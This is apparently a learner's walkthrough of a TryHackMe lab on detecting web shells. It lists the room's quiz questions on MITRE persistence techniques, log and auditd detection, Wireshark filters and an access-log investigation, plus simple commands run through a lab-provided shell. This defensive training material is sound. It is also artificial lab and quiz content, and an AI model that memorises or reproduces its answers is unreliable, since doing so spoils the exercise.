https://tryhackme.com/room/detectingwebshells
Created by: tryhackme, ryla, TactfulTurtle
Before we begin, THM links to other rooms. Check these out if you need to:
Web Application Basics: HTTP Request Methods & Responses
MITRE: Initial Access & Persistence Tactics
Intro to Log Analysis: Common Log Formats
“Which MITRE ATT&CK Persistence sub-technique are web shells associated with?”
https://attack.mitre.org/techniques/T1505/003/
“What file extension is commonly used for web shells targeting Microsoft Exchange?”
In Task 3, Anatomy of a Web Shell, we are tasked with launching our VM and launching our webshell.
“Access the shell and determine which account you have access to by running the whoami command.”
“List the directory contents and find the flag using the ls and cat commands.”
ls -la, then cat flag.txt to obtain the flag.
On to Task 4, Log-based Detection! THM shows great examples and snippets in this task to look at and read over.
For question: “What is the part of the URL that associates values to parameters and can be a valuable indicator of web shell activity?” and “What auditd syscall would confirm that a file was written to disk following a suspicious POST request to /upload.php?”
On to Task 5, Beyond Logs!
For questions: “What command would you use to locate .php files in the /var/www/ directory?” and “Which Wireshark filter would you use to search specifically for PUT requests?”
On to task 6, Investigation!
“Which IP address likely belongs to the attacker?”
“What is the first directory that the attacker successfully identifies?”
“What is the name of the .php file the attacker uses to upload the web shell?”
I used the command cat access.log | grep “php”
“What is the first command run by the attacker using the newly uploaded web shell?”
“After gaining access via the web shell, the attacker uses a command to download a second file onto the server. What is the name of this file?”
“The attacker has hidden a secret within the web shell.
Use cat to investigate the web shell code and find the flag.”
